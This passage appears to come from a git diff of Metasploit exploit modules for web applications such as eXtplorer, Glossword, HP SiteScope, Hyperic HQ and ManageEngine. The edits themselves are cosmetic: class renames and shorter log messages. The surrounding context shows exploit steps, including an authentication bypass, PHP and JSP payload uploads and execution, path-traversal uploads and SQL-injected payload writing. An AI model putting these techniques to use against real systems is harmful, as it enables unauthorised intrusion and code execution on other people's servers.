Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -141,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" # bypass auth - print_status("#{peer} - Authenticating as user (#{user})") + print_status("Authenticating as user (#{user})") res = auth_bypass(base, user) if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # search for writable directories - print_status("#{peer} - Retrieving writable subdirectories") + print_status("Retrieving writable subdirectories") begin res = send_request_cgi({ 'method' => 'POST', @@ -163,19 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" - print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})") + print_status("Successfully retrieved writable subdirectory (#{$1})") else dir = "#{base}" - print_error("#{peer} - Could not find a writable subdirectory.") + print_error("Could not find a writable subdirectory.") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, dir, @fname, php) if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote end # search directories in the web root for the file - print_status("#{peer} - Searching directories for file (#{@fname})") + print_status("Searching directories for file (#{@fname})") begin res = send_request_cgi({ 'method' => 'POST', @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') - print_good("#{peer} - Successfully found file") + print_good("Successfully found file") else - print_error("#{peer} - Failed to find file") + print_error("Failed to find file") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (/#{dir}/#{@fname})") + print_status("Executing payload (/#{dir}/#{@fname})") begin send_request_cgi({ 'method' => 'GET', @@ -213,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code != 200 - print_error("#{peer} - Executing payload failed") + print_error("Executing payload failed") end end end diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index 07e3741261..47fa520192 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index da1dbb571e..0911ea8a47 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gestioip_exec.rb b/modules/exploits/multi/http/gestioip_exec.rb index 7b7162bb13..5f4c75ebb5 100644 --- a/modules/exploits/multi/http/gestioip_exec.rb +++ b/modules/exploits/multi/http/gestioip_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/git_client_command_exec.rb b/modules/exploits/multi/http/git_client_command_exec.rb index 566cfea515..3f4972cdc2 100644 --- a/modules/exploits/multi/http/git_client_command_exec.rb +++ b/modules/exploits/multi/http/git_client_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb index 5f1b1054dc..730692f081 100644 --- a/modules/exploits/multi/http/gitlab_shell_exec.rb +++ b/modules/exploits/multi/http/gitlab_shell_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 8258c0e9f1..aa70e5f6ce 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 43782be301..dadd0efdc8 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -8,7 +8,7 @@ require 'nokogiri' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 0aa285ac06..1894ddd170 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -54,21 +54,21 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = login(base, user, pass) if res if res.code == 200 - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ - vprint_good("#{peer} - Authenticated successfully") + vprint_good("Authenticated successfully") return Exploit::CheckCode::Appears end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Safe @@ -128,23 +128,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login; get session id and token - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = login(base, user, pass) if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, sid, @fname, php) if res and res.code == 301 and res['location'] =~ /Setting saved/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve PHP file path - print_status("#{peer} - Locating PHP payload file") + print_status("Locating PHP payload file") begin res = send_request_cgi({ 'method' => 'GET', @@ -166,13 +166,13 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ shell_uri = "#{$1}" @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') - print_good("#{peer} - Found payload file path (#{shell_uri})") + print_good("Found payload file path (#{shell_uri})") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{shell_uri})") + print_status("Executing payload (#{shell_uri})") begin send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 19cdc98388..1703db59af 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index 2490945fbb..49ef2be08b 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index f8e6b61147..bc8becf8b6 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -93,11 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote def exploit if target.name =~ /Windows/ - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # cmd.exe max length is 8192 execute_cmdstager({:linemax => 8000, :nodelete => true}) elsif target.name =~ /Linux/ - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_command(payload.encoded, {:http_timeout => 1}) end end diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 7c5029cbf6..275271580a 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -88,15 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' # Create user with empty credentials - print_status("#{peer} - Creating user with empty credentials") + print_status("Creating user with empty credentials") if create_user.nil? - print_error("#{peer} - Failed to create user") + print_error("Failed to create user") return end # Generate an initial JSESSIONID - print_status("#{peer} - Retrieving an initial JSESSIONID") + print_status("Retrieving an initial JSESSIONID") res = send_request_cgi( 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' @@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else - print_error("#{peer} - Retrieve of initial JSESSIONID failed") + print_error("Retrieve of initial JSESSIONID failed") return end # Authenticate login_data = "j_username=&j_password=" - print_status("#{peer} - Authenticating on HP SiteScope Configuration") + print_status("Authenticating on HP SiteScope Configuration") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'j_security_check'), @@ -129,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote session_id = $1 redirect = URI(res.headers['Location']).path else - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end # Follow redirection to complete authentication process - print_status("#{peer} - Following redirection to finish authentication") + print_status("Following redirection to finish authentication") res = send_request_cgi( { 'uri' => redirect, @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote traversal = "..\\..\\..\\..\\..\\..\\" end - print_status("#{peer} - Uploading the payload") + print_status("Uploading the payload") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", @@ -249,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - Payload successfully uploaded to #{path}") + print_good("Payload successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the Payload") + print_error("Error uploading the Payload") return end post_data = Rex::MIME::Message.new post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") - print_status("#{peer} - Uploading the JSP") + print_status("Uploading the JSP") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", @@ -273,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - JSP successfully uploaded to #{path}") + print_good("JSP successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the JSP") + print_error("Error uploading the JSP") return end diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 9503af4d02..5ff5bc1d27 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager @@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote if @cookie.empty? fail_with(Failure::NoAccess, "#{peer} - Login failed") else - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + print_good("Logged in as '#{datastore['USERNAME']}'") end end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 6deb124231..bfcb22a5c5 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_warning("#{peer} - Could not access the script console") + print_warning("Could not access the script console") end if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") end end @@ -113,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - vprint_status("#{peer} - Authenticating as '#{user}'") + vprint_status("Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - vprint_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("Authenticated successfully as '#{user}'") # check access to the console - vprint_status("#{peer} - Checking access to the script console") + vprint_status("Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if not @to_delete.nil? - print_warning("#{peer} - Deleting #{@to_delete} payload file") + print_warning("Deleting #{@to_delete} payload file") execute_command("rm #{@to_delete}") end end @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res and res.code == 200 and res.body =~ /Executed/ - vprint_good("#{peer} - Command executed successfully") + vprint_good("Command executed successfully") else fail_with(Failure::Unknown, "#{peer} - Failed to execute the command.") end # version 4.6.6 returns a new CSRF nonce in the response if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") # version 4.5.2 does not, so we request a new one else get_nonce @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") http_send_command(java_craft_runtime_exec(cmd)) end @@ -258,23 +258,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + print_good("Authenticated successfully as '#{user}'") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # check access to the console and get CSRF nonce - print_status("#{peer} - Checking access to the script console") + print_status("Checking access to the script console") get_nonce # check operating system if target.name =~ /Automatic/ - print_status("#{peer} - Trying to detect the remote target...") + print_status("Trying to detect the remote target...") @my_target = get_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to detect the remote target") else - print_good("#{peer} - #{@my_target.name} target found") + print_good("#{@my_target.name} target found") end else @my_target = target @@ -283,10 +283,10 @@ class Metasploit3 < Msf::Exploit::Remote # send payload case @my_target['Platform'] when 'win' - print_status("#{peer} - Sending command stager...") + print_status("Sending command stager...") execute_cmdstager({:linemax => 2049}) when 'unix' - print_status("#{peer} - Sending UNIX payload...") + print_status("Sending UNIX payload...") http_send_command(java_craft_runtime_exec(payload.encoded)) when 'linux' print_status("#{rhost}:#{rport} - Sending Linux stager...") diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index 361c2c90ad..d95978ff4a 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 0fc393a14e..bfe151d892 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5e8d269d03..e3ddeb488b 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 4b68cfdd07..c5380c9318 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 514a6a45b3..50f2944360 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index b8670c6052..779dd807da 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index d825a6f68f..10ca92c3c8 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 924d348356..b1a4cc705a 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index c047d6242c..624e5aa36b 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false + if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target seems safe, so we will not continue.') return end diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index ec577eb1d3..cbbf4c166a 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -104,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote @fname = rand_text_numeric(7) # upload PHP payload to userpictures/[fname].php - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php) if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)") + print_status("Executing payload (userpictures/#{@fname}.php)") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index 0365b344fc..45aba792cc 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 5360e33007..dac6cb7080 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| - print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") + print_status("Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) - print_status("#{peer} - Requesting data.php") + print_status("Requesting data.php") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 35b1b39b40..930d4b482a 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Automatic targeting failed.") else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote inject_exec(fullpath) register_file_for_cleanup(fullpath.sub('../','')) - print_status("#{peer} - Requesting #{jsp_name}") + print_status("Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri(jsp_name)}) end @@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Selecting target, this might take a few seconds...") + print_status("Selecting target, this might take a few seconds...") rand_txt = rand_text_alpha_lower(8) << ".txt" paths = db_paths @@ -488,7 +488,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") + print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") if @my_target['Database'] == 'postgresql' inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'") @@ -528,12 +528,12 @@ class Metasploit3 < Msf::Exploit::Remote if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 if ver_gt(build, '80200') - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else - print_status("#{peer} - Detected Desktop Central v8 #{build} (MySQL)") + print_status("Detected Desktop Central v8 #{build} (MySQL)") end else - print_status("#{peer} - Detected Desktop Central v8 (MySQL)") + print_status("Detected Desktop Central v8 (MySQL)") end # DC v8 < 80200 uses the MySQL database Exploit::CheckCode::Appears @@ -542,7 +542,7 @@ class Metasploit3 < Msf::Exploit::Remote def check_desktop_central_9(body) if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 - print_status("#{peer} - Detected Desktop Central v9 #{build}") + print_status("Detected Desktop Central v9 #{build}") if ver_lt(build, '90039') return Exploit::CheckCode::Appears else @@ -565,7 +565,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ 